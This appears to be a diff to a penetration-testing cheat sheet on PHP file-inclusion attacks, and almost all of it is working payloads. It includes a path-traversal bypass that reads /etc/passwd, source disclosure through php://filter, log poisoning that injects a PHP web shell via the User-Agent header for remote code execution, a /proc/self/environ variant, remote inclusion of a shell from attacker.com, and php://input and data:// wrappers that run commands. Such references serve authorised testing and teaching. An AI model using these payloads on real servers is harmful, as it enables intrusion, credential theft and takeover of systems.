 ?file=....//....//....//etc/passwd # bypass ../ filter

-?lang=php://filter/convert.base64-encode/resource=index.php # read PHP source
+?lang=php://filter/convert.base64-encode/resource=index.php # read PHP source as base64

-# LFI → RCE via log poisoning
+# LFI to RCE via log poisoning

-# 1. Inject PHP into User-Agent header:
+# 1. Inject PHP into the User-Agent header so it gets written to the access log:

 curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/

-# 2. Include the log file:
+# 2. Include the log file to trigger execution:

 ?page=/var/log/apache2/access.log&cmd=id

-# LFI → RCE via /proc/self/environ
+# LFI to RCE via /proc/self/environ (older servers)

 ?page=/proc/self/environ&cmd=id

-# Remote File Inclusion (RFI)
+# Remote File Inclusion (RFI) — load and execute a remote file

 ?page=http://attacker.com/shell.php

-# PHP wrappers
+# PHP wrappers for advanced LFI

-?page=php://input # POST PHP code in body
+?page=php://input # POST raw PHP code in request body

 ?page=data://text/plain,<?php system('id'); ?>